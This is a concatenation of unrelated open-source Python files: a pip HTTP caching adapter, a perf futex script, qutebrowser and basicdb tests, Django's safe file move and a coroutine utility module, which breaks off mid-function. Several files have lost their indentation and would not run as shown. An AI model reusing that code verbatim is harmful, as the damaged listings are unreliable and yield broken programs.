        would also raise — presumably prevented upstream; confirm.
        """
        data=context["data"]
        path=context["path"]
        line=get_data_path(data,path,parent=True)
        margin=line["est_margin_percent_input"]
        # price = cost / (1 - margin/100), rounded per unit
        amt=line["est_cost_amount"]/(1-margin/Decimal(100))
        price=round(amt/line["qty"])
        line["unit_price"]=price
        self.update_amounts(context)
        return data

    def get_relative_currency_rate(self,ids,currency_id):
        """Rate converting currency_id into the quotation currency.

        A manual override in obj.currency_rates wins; otherwise the rate is
        derived from the system rates of both currencies at the quotation
        date (missing rates default to 1).
        """
        obj=self.browse(ids[0])
        rate=None
        for r in obj.currency_rates:
            if r.currency_id.id==currency_id:
                rate=r.rate
                break
        if rate is None:
            rate_from=get_model("currency").get_rate([currency_id],obj.date) or Decimal(1)
            rate_to=obj.currency_id.get_rate(obj.date) or Decimal(1)
            rate=rate_from/rate_to
        return rate
SaleQuot.register()
| mit |
patrickcurl/ztruck | dj/lib/python2.7/site-packages/pip/_vendor/cachecontrol/adapter.py | 469 | 4196 | import functools
from pip._vendor.requests.adapters import HTTPAdapter
from .controller import CacheController
from .cache import DictCache
from .filewrapper import CallbackFileWrapper
class CacheControlAdapter(HTTPAdapter):
invalidating_methods = set(['PUT', 'DELETE'])
def __init__(self, cache=None,
cache_etags=True,
controller_class=None,
serializer=None,
heuristic=None,
*args, **kw):
super(CacheControlAdapter, self).__init__(*args, **kw)
self.cache = cache or DictCache()
self.heuristic = heuristic
controller_factory = controller_class or CacheController
self.controller = controller_factory(
self.cache,
cache_etags=cache_etags,
serializer=serializer,
)
def send(self, request, **kw):
"""
Send a request. Use the request information to see if it
exists in the cache and cache the response if we need to and can.
"""
if request.method == 'GET':
cached_response = self.controller.cached_request(request)
if cached_response:
return self.build_response(request, cached_response,
from_cache=True)
# check for etags and add headers if appropriate
request.headers.update(
self.controller.conditional_headers(request)
)
resp = super(CacheControlAdapter, self).send(request, **kw)
return resp
def build_response(self, request, response, from_cache=False):
"""
Build a response by making a request or using the cache.
This will end up calling send and returning a potentially
cached response
"""
if not from_cache and request.method == 'GET':
# apply any expiration heuristics
if response.status == 304:
# We must have sent an ETag request. This could mean
# that we've been expired already or that we simply
# have an etag. In either case, we want to try and
# update the cache if that is the case.
cached_response = self.controller.update_cached_response(
request, response
)
if cached_response is not response:
from_cache = True
# We are done with the server response, read a
# possible response body (compliant servers will
# not return one, but we cannot be 100% sure) and
# release the connection back to the pool.
response.read(decode_content=False)
response.release_conn()
response = cached_response
# We always cache the 301 responses
elif response.status == 301:
self.controller.cache_response(request, response)
else:
# Check for any heuristics that might update headers
# before trying to cache.
if self.heuristic:
response = self.heuristic.apply(response)
# Wrap the response file with a wrapper that will cache the
# response when the stream has been consumed.
response._fp = CallbackFileWrapper(
response._fp,
functools.partial(
self.controller.cache_response,
request,
response,
)
)
resp = super(CacheControlAdapter, self).build_response(
request, response
)
# See if we should invalidate the cache.
if request.method in self.invalidating_methods and resp.ok:
cache_url = self.controller.cache_url(request.url)
self.cache.delete(cache_url)
# Give the request a from_cache attr to let people use it
resp.from_cache = from_cache
return resp
    def close(self):
        """Release the cache's resources, then close the underlying adapter."""
        self.cache.close()
        super(CacheControlAdapter, self).close()
| apache-2.0 |
chrisw957/gumstix-linux | tools/perf/scripts/python/futex-contention.py | 1997 | 1508 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
# Per-thread tracking state, keyed by tid.
# NOTE: process_names was previously initialized twice (once here and once
# after lock_waits); the redundant rebinding has been collapsed into one.
process_names = {}     # long-lived tid-to-execname mapping
thread_thislock = {}   # futex address each thread is currently blocked on
thread_blocktime = {}  # timestamp (ns) at which each thread started blocking

lock_waits = {}  # long-lived stats on (tid, lock) blockage elapsed time
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm, callchain,
			nr, uaddr, op, val, utime, uaddr2, val3):
	# Only FUTEX_WAIT marks the start of a blocking interval; skip every
	# other futex command (we don't care about originators of WAKE events).
	if (op & FUTEX_CMD_MASK) != FUTEX_WAIT:
		return
	process_names[tid] = comm
	thread_thislock[tid] = uaddr
	thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm, callchain,
			nr, ret):
	# If this thread was blocked on a futex, record how long it waited.
	# `tid in dict` replaces dict.has_key(), which was removed in
	# Python 3; the `in` operator behaves identically on Python 2.
	if tid in thread_blocktime:
		elapsed = nsecs(s, ns) - thread_blocktime[tid]
		add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
		del thread_blocktime[tid]
		del thread_thislock[tid]
def trace_begin():
	# print() as a function call: on Python 2 this is a parenthesized
	# expression with identical output, and it is valid syntax on Python 3
	# (the bare print statement is not).
	print("Press control+C to stop and show the summary")
def trace_end():
	# Print one contention summary line per (tid, lock) pair.
	# Renamed the unpacked stats so they no longer shadow the min/max
	# builtins, and switched the print statement to the print() form,
	# which behaves the same on Python 2 and is valid on Python 3.
	for (tid, lock), stats in lock_waits.items():
		min_ns, max_ns, avg, count = stats
		print("%s[%d] lock %x contended %d times, %d avg ns" %
		      (process_names[tid], tid, lock, count, avg))
| gpl-2.0 |
airodactyl/qutebrowser | tests/end2end/features/test_misc_bdd.py | 5 | 1401 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2015-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
import json
import pytest_bdd as bdd
bdd.scenarios('misc.feature')
@bdd.then(bdd.parsers.parse('the PDF {filename} should exist in the tmpdir'))
def pdf_exists(quteproc, tmpdir, filename):
    """Assert that *filename* in tmpdir exists and starts with a PDF header.

    The parse string must contain the ``{filename}`` placeholder so
    pytest-bdd can bind the step's ``filename`` argument; without it the
    parameter could never be filled in.
    """
    path = tmpdir / filename
    data = path.read_binary()
    assert data.startswith(b'%PDF')
@bdd.when(bdd.parsers.parse('I set up "{lists}" as block lists'))
def set_up_blocking(quteproc, lists, server):
    """Point content.host_blocking.lists at the given files on the test server."""
    base = 'http://localhost:{}/data/adblock/'.format(server.port)
    urls = [base + name.strip() for name in lists.split(',')]
    quteproc.set_setting('content.host_blocking.lists', json.dumps(urls))
| gpl-3.0 |
adieu/django-nonrel | django/core/files/move.py | 403 | 2931 | """
Move a file in the safest way possible::
>>> from django.core.files.move import file_move_safe
>>> file_move_safe("/tmp/old_file", "/tmp/new_file")
"""
import os
from django.core.files import locks
# shutil.copystat is normally available; keep a minimal reimplementation
# as a fallback for platforms/Python builds that lack it.
try:
    from shutil import copystat
except ImportError:
    import stat

    def copystat(src, dst):
        """Copy all stat info (mode bits, atime and mtime) from src to dst"""
        st = os.stat(src)
        mode = stat.S_IMODE(st.st_mode)
        # utime/chmod are guarded because not every platform provides them.
        if hasattr(os, 'utime'):
            os.utime(dst, (st.st_atime, st.st_mtime))
        if hasattr(os, 'chmod'):
            os.chmod(dst, mode)
__all__ = ['file_move_safe']
def _samefile(src, dst):
# Macintosh, Unix.
if hasattr(os.path,'samefile'):
try:
return os.path.samefile(src, dst)
except OSError:
return False
# All other platforms: check for same pathname.
return (os.path.normcase(os.path.abspath(src)) ==
os.path.normcase(os.path.abspath(dst)))
def file_move_safe(old_file_name, new_file_name, chunk_size = 1024*64, allow_overwrite=False):
    """
    Moves a file from one location to another in the safest way possible.

    First, tries ``os.rename``, which is simple but will break across filesystems.
    If that fails, streams manually from one file to another in pure Python.

    If the destination file exists and ``allow_overwrite`` is ``False``, this
    function will throw an ``IOError``.
    """
    # There's no reason to move if we don't have to.
    if _samefile(old_file_name, new_file_name):
        return
    try:
        os.rename(old_file_name, new_file_name)
        return
    except OSError:
        # This will happen with os.rename if moving to another filesystem
        # or when moving opened files on certain operating systems
        pass
    # first open the old file, so that it won't go away
    old_file = open(old_file_name, 'rb')
    try:
        # now open the new file, not forgetting allow_overwrite
        # O_EXCL makes os.open raise if the destination already exists,
        # unless overwriting was explicitly allowed.
        fd = os.open(new_file_name, os.O_WRONLY | os.O_CREAT | getattr(os, 'O_BINARY', 0) |
                                    (not allow_overwrite and os.O_EXCL or 0))
        try:
            locks.lock(fd, locks.LOCK_EX)
            current_chunk = None
            # read() returns the empty (byte) string exactly at EOF.
            while current_chunk != '':
                current_chunk = old_file.read(chunk_size)
                os.write(fd, current_chunk)
        finally:
            locks.unlock(fd)
            os.close(fd)
    finally:
        old_file.close()
    # Preserve mode bits and timestamps on the copy before removing the
    # original.
    copystat(old_file_name, new_file_name)
    try:
        os.remove(old_file_name)
    except OSError, e:  # Python 2 except-clause syntax
        # Certain operating systems (Cygwin and Windows)
        # fail when deleting opened files, ignore it.  (For the
        # systems where this happens, temporary files will be auto-deleted
        # on close anyway.)
        if getattr(e, 'winerror', 0) != 32 and getattr(e, 'errno', 0) != 13:
            raise
| bsd-3-clause |
varunarya10/basicdb | basicdb/tests/test_functional.py | 3 | 10611 | import boto
import boto.exception
import boto.regioninfo
import errno
import os
from multiprocessing import Process, Event
import signal
import testtools as unittest
import basicdb
def run_server(port, server_ready, done):
    """Child-process entry point: serve basicdb.app over WSGI on *port*.

    *server_ready* is set once the server is listening; *done* is accepted
    but not used here (the parent stops the child with SIGINT instead).
    """
    # If the parent process is being measured by coverage.py, start a
    # collector in this child too and flush it when SIGINT arrives.
    from coverage.collector import Collector
    from coverage.control import coverage
    if Collector._collectors:
        cov = coverage(data_suffix=True)
        cov.start()

        def stop_cov(*args):
            cov.stop()
            cov.save()
            raise SystemExit('killed')
    else:
        def stop_cov(*args):
            raise SystemExit('killed')

    # Silence the child by pointing stdin/stdout/stderr at a scratch file.
    # NOTE(review): '/tmp/null' is a real file on disk -- os.devnull looks
    # like what was intended; confirm before changing.
    fp = open('/tmp/null', 'a+')
    os.dup2(fp.fileno(), 0)
    os.dup2(fp.fileno(), 1)
    os.dup2(fp.fileno(), 2)
    # REMOTE_USER is read by the app (presumably for authentication) --
    # provide a fake identity for the tests; verify against basicdb.app.
    os.environ['REMOTE_USER'] = 'fake'
    from wsgiref.simple_server import make_server
    s = make_server('localhost', port, basicdb.app)
    signal.signal(signal.SIGINT, stop_cov)
    server_ready.set()
    s.serve_forever()
class FunctionalTests(object):
    """Mixin that boots a private basicdb server, or reuses an external one.

    If BASICDB_PORT is set in the environment, the tests talk to that
    already-running server and teardown is a no-op; otherwise a child
    process serving on port 8000 is forked per test and killed afterwards.
    """

    def setUp(self):
        super(FunctionalTests, self).setUp()
        existing_server = os.environ.get('BASICDB_PORT', False)
        if not existing_server:
            def kill_server():
                # SIGINT the child repeatedly until it is gone (ESRCH).
                while True:
                    try:
                        os.kill(self.server.pid, signal.SIGINT)
                        self.server.join(1)
                    except OSError, e:  # Python 2 except-clause syntax
                        if e.errno == errno.ESRCH:
                            break
                        raise
            self.server_ready = Event()
            self.done = Event()
            self.server = Process(target=run_server, args=(8000, self.server_ready, self.done))
            self.server.start()
            self.port = 8000
            # Block until the child signals that its WSGI server is listening.
            self.server_ready.wait()
        else:
            def kill_server():
                pass
            self.port = int(existing_server)
        self.kill_server = kill_server

    def tearDown(self):
        super(FunctionalTests, self).tearDown()
        self.kill_server()
class _BotoTests(FunctionalTests):
def setUp(self):
super(_BotoTests, self).setUp()
local_region = boto.regioninfo.RegionInfo(name='local',
endpoint='localhost')
self.conn = boto.connect_sdb('', '',
region=local_region,
is_secure=False, port=self.port)
def _test_create_list_delete_domains(self):
self.conn.create_domain('test-domain')
self.conn.create_domain('test-domain-2')
domains = self.conn.get_all_domains()
self.assertEquals(len(domains), 2)
self.assertIn('test-domain', set([d.name for d in domains]))
self.assertIn('test-domain-2', set([d.name for d in domains]))
self.conn.delete_domain('test-domain')
domains = self.conn.get_all_domains()
self.assertEquals(len(domains), 1)
self.assertIn('test-domain-2', set([d.name for d in domains]))
self.conn.delete_domain('test-domain-2')
domains = self.conn.get_all_domains()
self.assertEquals(len(domains), 0)
def test_get_domain(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
self.assertIsNot(dom, None)
self.conn.delete_domain('test-domain')
def test_get_domain_metadata(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
domain_meta = self.conn.domain_metadata(dom)
self.conn.delete_domain('test-domain')
def test_add_item(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
item_name = 'ABC_123'
item_attrs = {'Artist': 'The Jackson 5', 'Genera':'Pop'}
retval = dom.put_attributes(item_name, item_attrs)
self.assertEquals(retval, True)
domain_meta = self.conn.domain_metadata(dom)
self.assertEquals(domain_meta.item_count, 1)
self.conn.delete_domain('test-domain')
def test_delete_attrs(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
item_name = 'ABC_123'
item_attrs = {'Artist': 'The Jackson 5', 'Genera':'Pop'}
retval = dom.put_attributes(item_name, item_attrs)
self.assertEquals(retval, True)
dom.delete_attributes(item_name, ['Artist'])
self.assertEquals(dom.get_attributes(item_name),
{'Genera': 'Pop'})
self.conn.delete_domain('test-domain')
def test_add_item_conditionally(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain')
item_name = 'test-item'
item_attrs = {'attr1': 'attr1val1', 'attr2': 'attr2val1'}
retval = dom.put_attributes(item_name, item_attrs)
self.assertEquals(retval, True)
self.assertEquals(dom.get_attributes('test-item'),
{'attr1': 'attr1val1', 'attr2': 'attr2val1'})
item_attrs = {'attr1': 'attr1val2'}
self.assertRaises(boto.exception.BotoServerError,
dom.put_attributes, item_name, item_attrs,
replace=False, expected_value=('attr1', 'attr1val2'))
self.assertEquals(dom.get_attributes('test-item'),
{'attr1': 'attr1val1', 'attr2': 'attr2val1'},
"Updated value even thought expectations were not met")
self.assertRaises(boto.exception.BotoServerError,
dom.put_attributes, item_name, item_attrs,
replace=False, expected_value=('attr1', False))
self.assertEquals(dom.get_attributes('test-item'),
{'attr1': 'attr1val1', 'attr2': 'attr2val1'},
"Updated value even thought expectations were not met")
retval = dom.put_attributes(item_name, item_attrs,
replace=False, expected_value=('attr1', True))
self.assertEquals(dom.get_attributes('test-item'),
{'attr1': ['attr1val1', 'attr1val2'], 'attr2': 'attr2val1'},
"Did not update value even thought expectations were met")
self.conn.delete_domain('test-domain')
def test_batch_add_items(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain', validate=False)
items = {'item1':{'attr1':'val1'},'item2':{'attr2':'val2'}}
dom.batch_put_attributes(items)
self.assertEquals(dom.get_attributes('item1'), {'attr1': 'val1'})
self.assertEquals(dom.get_attributes('item2'), {'attr2': 'val2'})
self.conn.delete_domain('test-domain')
def test_batch_delete_items(self):
self.conn.create_domain('test-domain')
dom = self.conn.get_domain('test-domain', validate=False)
items = {'item1':{'attr1':'val1'},'item2':{'attr2':'val2'}}
dom.batch_put_attributes(items)
items = {'item1':{'attr1':'val2'},'item2':{'attr3':'val3'}}
dom.batch_put_attributes(items, replace=False)
item1_attrs = dom.get_attributes('item1')
self.assertEquals(len(item1_attrs), 1)
self.assertEquals(set(item1_attrs['attr1']), set(["val1", "val2"]))
item2_attrs = dom.get_attributes('item2')
self.assertEquals(item2_attrs, {"attr2": "val2", "attr3": "val3"})
dom.batch_delete_attributes({"item1": {"attr1": "val2"}, "item2": None})
item1_attrs = dom.get_attributes('item1')
self.assertEquals(item1_attrs, {"attr1": "val1"})
def _load_sample_query_data_set(self):
dom = self.conn.create_domain('mydomain')
dom.put_attributes("0385333498",
{"Title": "The Sirens of Titan",
"Author": "Kurt Vonnegut",
"Year": "1959",
"Pages": "00336",
"Keyword": ["Book", "Paperback"],
"Rating": ["*****", "5 stars", "Excellent"]})
dom.put_attributes("0802131786",
{"Title": "Tropic of Cancer",
"Author": "Henry Miller",
"Year": "1934",
"Pages": "00318",
"Keyword": "Book",
"Rating": "****"})
dom.put_attributes("1579124585",
{"Title": "The Right Stuff",
"Author": "Tom Wolfe",
"Year": "1979",
"Pages": "00304",
"Keyword": ["Book", "Hardcover", "American"],
"Rating": ["****", "4 stars"]})
dom.put_attributes("B000T9886K",
{"Title": "In Between",
"Author": "Paul Van Dyk",
"Year": "2007",
"Keyword": ["CD", "Trance"],
"Rating": "4 stars"})
dom.put_attributes("B00005JPLW",
{"Title": "300",
"Author": "Zack Snyder",
"Year": "2007",
"Keyword": ["DVD", "Action", "Frank Miller"],
"Rating": ["***", "3 stars", "Not bad"]})
dom.put_attributes("B000SF3NGK",
{"Title": "Heaven's Gonna Burn Your Eyes",
"Author": "Thievery Corporation",
"Year": "2002",
"Rating": "*****"})
return dom
def test_select(self):
dom = self._load_sample_query_data_set()
res = dom.select("select * from mydomain where Title = 'The Right Stuff'")
for row in res:
print row
class FakeBackedBotoTests(_BotoTests, unittest.TestCase):
    # Concrete suite: runs the shared _BotoTests cases against the
    # in-memory 'fake' backend.
    @classmethod
    def setUpClass(cls):
        super(FakeBackedBotoTests, cls).setUpClass()
        basicdb.load_backend('fake')
class _FilesystemBackedBotoTests(_BotoTests):
    # Leading underscore and no unittest.TestCase base: apparently kept
    # around but not collected by the test runner (suite disabled).
    @classmethod
    def setUpClass(cls):
        super(_FilesystemBackedBotoTests, cls).setUpClass()
        basicdb.load_backend('filesystem')
class _RiakBackedBotoTests(_BotoTests):
    # Leading underscore and no unittest.TestCase base: apparently kept
    # around but not collected by the test runner (suite disabled).
    @classmethod
    def setUpClass(cls):
        super(_RiakBackedBotoTests, cls).setUpClass()
        basicdb.load_backend('riak')
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
epage/DialCentral | dialcentral/util/coroutines.py | 10 | 12377 | #!/usr/bin/env python
"""
Uses for generators
* Pull pipelining (iterators)
* Push pipelining (coroutines)
* State machines (coroutines)
* "Cooperative multitasking" (coroutines)
* Algorithm -> Object transform for cohesiveness (for example context managers) (coroutines)
Design considerations
* When should a stage pass on exceptions or have it thrown within it?
* When should a stage pass on GeneratorExits?
* Is there a way to either turn a push generator into a iterator or to use
comprehensions syntax for push generators (I doubt it)
* When should the stage try and send data in both directions
* Since pull generators (generators), push generators (coroutines), subroutines, and coroutines are all coroutines, maybe we should rename the push generators to not confuse them, like signals/slots? and then refer to two-way generators as coroutines
** If so, make s* and co* implementation of functions
"""
import threading
import Queue
import pickle
import functools
import itertools
import xml.sax
import xml.parsers.expat
def autostart(func):
    """
    Decorator: advance a freshly created generator to its first ``yield``
    so the returned coroutine is immediately ready for ``.send()``.

    >>> @autostart
    ... def grep_sink(pattern):
    ... 	print "Looking for %s" % pattern
    ... 	while True:
    ... 		line = yield
    ... 		if pattern in line:
    ... 			print line,
    >>> g = grep_sink("python")
    Looking for python
    >>> g.send("Yeah but no but yeah but no")
    >>> g.send("A series of tubes")
    >>> g.send("python generators rock!")
    python generators rock!
    >>> g.close()
    """

    @functools.wraps(func)
    def start(*args, **kwargs):
        cr = func(*args, **kwargs)
        # next(cr) works on Python 2.6+ *and* Python 3, unlike the
        # generator .next() method, which Python 3 removed.
        next(cr)
        return cr

    return start
@autostart
def printer_sink(format = "%s"):
    """
    Sink that prints every item it receives, rendered through *format*.

    >>> pr = printer_sink("%r")
    >>> pr.send("Hello")
    'Hello'
    >>> pr.send("5")
    '5'
    >>> pr.send(5)
    5
    >>> p = printer_sink()
    >>> p.send("Hello")
    Hello
    >>> p.send("World")
    World
    >>> # p.throw(RuntimeError, "Goodbye")
    >>> # p.send("Meh")
    >>> # p.close()
    """
    while True:
        item = yield
        # print() form: identical output on Python 2 (parenthesized
        # expression), valid syntax on Python 3.  `format` deliberately
        # keeps its name -- it is part of the public keyword interface.
        print(format % (item, ))
@autostart
def null_sink():
    """Silently discard every item sent to it.

    Good for uses like with cochain to pick up any slack.
    """
    while True:
        _ = yield
def itr_source(itr, target):
    """Push every element of *itr* into the coroutine *target*, in order.

    >>> itr_source(xrange(2), printer_sink())
    0
    1
    """
    send = target.send
    for elem in itr:
        send(elem)
@autostart
def cofilter(predicate, target):
"""
>>> p = printer_sink()
>>> cf = cofilter(None, p)
>>> cf.send("")
>>> cf.send("Hello")
Hello
>>> cf.send([])
>>> cf.send([1, 2])
[1, 2]
>>> cf.send(False)
>>> cf.send(True)
True
>>> cf.send(0)
>>> cf.send(1)
1
>>> # cf.throw(RuntimeError, "Goodbye")
>>> # cf.send(False)
>>> # cf.send(True)
>>> # cf.close()
"""
if predicate is None:
predicate = bool
while True:
try:
item = yield
if predicate(item):
target.send(item)
except StandardError, e:
target.throw(e.__class__, e.message)
@autostart
def comap(function, target):
"""
>>> p = printer_sink()
>>> cm = comap(lambda x: x+1, p)
>>> cm.send(0)
1
>>> cm.send(1.0)
2.0
>>> cm.send(-2)
-1
>>> # cm.throw(RuntimeError, "Goodbye")
>>> # cm.send(0)
>>> # cm.send(1.0)
>>> # cm.close()
"""
while True:
try:
item = yield
mappedItem = function(item)
target.send(mappedItem)
except StandardError, e:
target.throw(e.__class__, e.message)
def func_sink(function):
    """Build a sink that applies *function* to each incoming item (for side effects)."""
    tail = null_sink()
    return comap(function, tail)
def expand_positional(function):
    """Wrap *function* so it takes a single iterable, unpacked as positional args."""

    @functools.wraps(function)
    def unpack_and_call(packed):
        return function(*packed)

    return unpack_and_call
@autostart
def append_sink(l):
"""
>>> l = []
>>> apps = append_sink(l)
>>> apps.send(1)
>>> apps.send(2)
>>> apps.send(3)
>>> print l
[1, 2, 3]
"""
while True:
item = yield
l.append(item)
@autostart
def last_n_sink(l, n = 1):
"""
>>> l = []
>>> lns = last_n_sink(l)
>>> lns.send(1)
>>> lns.send(2)
>>> lns.send(3)
>>> print l
[3]
"""
del l[:]
while True:
item = yield
extraCount = len(l) - n + 1
if 0 < extraCount:
del l[0:extraCount]
l.append(item)
@autostart
def coreduce(target, function, initializer = None):
"""
>>> reduceResult = []
>>> lns = last_n_sink(reduceResult)
>>> cr = coreduce(lns, lambda x, y: x + y, 0)
>>> cr.send(1)
>>> cr.send(2)
>>> cr.send(3)
>>> print reduceResult
[6]
>>> cr = coreduce(lns, lambda x, y: x + y)
>>> cr.send(1)
>>> cr.send(2)
>>> cr.send(3)
>>> print reduceResult
[6]
"""
isFirst = True
cumulativeRef = initializer
while True:
item = yield
if isFirst and initializer is None:
cumulativeRef = item
else:
cumulativeRef = function(cumulativeRef, item)
target.send(cumulativeRef)
isFirst = False
@autostart
def cotee(targets):
"""
Takes a sequence of coroutines and sends the received items to all of them
>>> ct = cotee((printer_sink("1 %s"), printer_sink("2 %s")))
>>> ct.send("Hello")
1 Hello
2 Hello
>>> ct.send("World")
1 World
2 World
>>> # ct.throw(RuntimeError, "Goodbye")
>>> # ct.send("Meh")
>>> # ct.close()
"""
while True:
try:
item = yield
for target in targets:
target.send(item)
except StandardError, e:
for target in targets:
target.throw(e.__class__, e.message)
class CoTee(object):
"""
>>> ct = CoTee()
>>> ct.register_sink(printer_sink("1 %s"))
>>> ct.register_sink(printer_sink("2 %s"))
>>> ct.stage.send("Hello")
1 Hello
2 Hello
>>> ct.stage.send("World")
1 World
2 World
>>> ct.register_sink(printer_sink("3 %s"))
>>> ct.stage.send("Foo")
1 Foo
2 Foo
3 Foo
>>> # ct.stage.throw(RuntimeError, "Goodbye")
>>> # ct.stage.send("Meh")
>>> # ct.stage.close()
"""
def __init__(self):
self.stage = self._stage()
self._targets = []
def register_sink(self, sink):
self._targets.append(sink)
def unregister_sink(self, sink):
self._targets.remove(sink)
def restart(self):
self.stage = self._stage()
@autostart
def _stage(self):
while True:
try:
item = yield
for target in self._targets:
target.send(item)
except StandardError, e:
for target in self._targets:
target.throw(e.__class__, e.message)
def _flush_queue(queue):
while not queue.empty():
yield queue.get()
@autostart
def cocount(target, start = 0):
"""
>>> cc = cocount(printer_sink("%s"))
>>> cc.send("a")
0
>>> cc.send(None)
1
>>> cc.send([])
2
>>> cc.send(0)
3
"""
for i in itertools.count(start):
item = yield
target.send(i)
@autostart
def coenumerate(target, start = 0):
"""
>>> ce = coenumerate(printer_sink("%r"))
>>> ce.send("a")
(0, 'a')
>>> ce.send(None)
(1, None)
>>> ce.send([])
(2, [])
>>> ce.send(0)
(3, 0)
"""
for i in itertools.count(start):
item = yield
decoratedItem = i, item
target.send(decoratedItem)
@autostart
def corepeat(target, elem):
"""
>>> cr = corepeat(printer_sink("%s"), "Hello World")
>>> cr.send("a")
Hello World
>>> cr.send(None)
Hello World
>>> cr.send([])
Hello World
>>> cr.send(0)
Hello World
"""
while True:
item = yield
target.send(elem)
@autostart
def cointercept(target, elems):
"""
>>> cr = cointercept(printer_sink("%s"), [1, 2, 3, 4])
>>> cr.send("a")
1
>>> cr.send(None)
2
>>> cr.send([])
3
>>> cr.send(0)
4
>>> cr.send("Bye")
Traceback (most recent call last):
File "/usr/lib/python2.5/doctest.py", line 1228, in __run
compileflags, 1) in test.globs
File "<doctest __main__.cointercept[5]>", line 1, in <module>
cr.send("Bye")
StopIteration
"""
item = yield
for elem in elems:
target.send(elem)
item = yield
@autostart
def codropwhile(target, pred):
"""
>>> cdw = codropwhile(printer_sink("%s"), lambda x: x)
>>> cdw.send([0, 1, 2])
>>> cdw.send(1)
>>> cdw.send(True)
>>> cdw.send(False)
>>> cdw.send([0, 1, 2])
[0, 1, 2]
>>> cdw.send(1)
1
>>> cdw.send(True)
True
"""
while True:
item = yield
if not pred(item):
break
while True:
item = yield
target.send(item)
@autostart
def cotakewhile(target, pred):
"""
>>> ctw = cotakewhile(printer_sink("%s"), lambda x: x)
>>> ctw.send([0, 1, 2])
[0, 1, 2]
>>> ctw.send(1)
1
>>> ctw.send(True)
True
>>> ctw.send(False)
>>> ctw.send([0, 1, 2])
>>> ctw.send(1)
>>> ctw.send(True)
"""
while True:
item = yield
if not pred(item):
break
target.send(item)
while True:
item = yield
@autostart
def coslice(target, lower, upper):
"""
>>> cs = coslice(printer_sink("%r"), 3, 5)
>>> cs.send("0")
>>> cs.send("1")
>>> cs.send("2")
>>> cs.send("3")
'3'
>>> cs.send("4")
'4'
>>> cs.send("5")
>>> cs.send("6")
"""
for i in xrange(lower):
item = yield
for i in xrange(upper - lower):
item = yield
target.send(item)
while True:
item = yield
@autostart
def cochain(targets):
"""
>>> cr = cointercept(printer_sink("good %s"), [1, 2, 3, 4])
>>> cc = cochain([cr, printer_sink("end %s")])
>>> cc.send("a")
good 1
>>> cc.send(None)
good 2
>>> cc.send([])
good 3
>>> cc.send(0)
good 4
>>> cc.send("Bye")
end Bye
"""
behind = []
for target in targets:
try:
while behind:
item = behind.pop()
target.send(item)
while True:
item = yield
target.send(item)
except StopIteration:
behind.append(item)
@autostart
def queue_sink(queue):
"""
>>> q = Queue.Queue()
>>> qs = queue_sink(q)
>>> qs.send("Hello")
>>> qs.send("World")
>>> qs.throw(RuntimeError, "Goodbye")
>>> qs.send("Meh")
>>> qs.close()
>>> print [i for i in _flush_queue(q)]
[(None, 'Hello'), (None, 'World'), (<type 'exceptions.RuntimeError'>, 'Goodbye'), (None, 'Meh'), (<type 'exceptions.GeneratorExit'>, None)]
"""
while True:
try:
item = yield
queue.put((None, item))
except StandardError, e:
queue.put((e.__class__, e.message))
except GeneratorExit:
queue.put((GeneratorExit, None))
raise
def decode_item(item, target):
    """Replay one encoded event tuple onto the coroutine *target*.

    ``(None, value)`` forwards the value, ``(GeneratorExit, ...)`` closes
    the target, anything else is thrown into it.  Returns True exactly when
    the target was closed (end of stream).  Note that ``item[1]`` is only
    touched when needed -- the GeneratorExit event may be a 1-tuple.
    """
    kind = item[0]
    if kind is None:
        target.send(item[1])
        return False
    if kind is GeneratorExit:
        target.close()
        return True
    target.throw(kind, item[1])
    return False
def queue_source(queue, target):
    """Drain *queue*, replaying each encoded event into *target*.

    Blocks on ``queue.get()`` and stops as soon as decode_item reports that
    the target was closed (i.e. a ``(GeneratorExit, None)`` event arrived).
    """
    while True:
        if decode_item(queue.get(), target):
            break
def threaded_stage(target, thread_factory = threading.Thread):
messages = Queue.Queue()
run_source = functools.partial(queue_source, messages, target)
thread_factory(target=run_source).start()
# Sink running in current thread
return functools.partial(queue_sink, messages)
@autostart
def pickle_sink(f):
while True:
try:
item = yield
pickle.dump((None, item), f)
except StandardError, e:
pickle.dump((e.__class__, e.message), f)
except GeneratorExit:
pickle.dump((GeneratorExit, ), f)
raise
except StopIteration:
f.close()
return
def pickle_source(f, target):
try:
isDone = False
while not isDone:
item = pickle.load(f)
isDone = decode_item(item, target)
except EOFError:
target.close()
class EventHandler(object, xml.sax.ContentHandler):
START = "start"
TEXT = "text"
END = "end"
def __init__(self, target):
object.__init__(self)
xml.sax.ContentHandler.__init__(self)
self._target = target
def startElement(self, name, attrs):
self._target.send((self.START, (name, attrs._attrs)))
def characters(self, text):
self._target.send((self.TEXT, text))
def endElement(self, name):
self._target.send((self.END, name))
def expat_parse(f, target):
parser = xml.parsers.expat.ParserCreate()
parser.buffer_size = 65536
parser.buffer_text = True
parser.returns_unicode = False
parser.StartElementHandler = lambda name, attrs: target.send(('start', (name, attrs)))
parser.EndElementHandler = lambda name: target.send(('end', name))
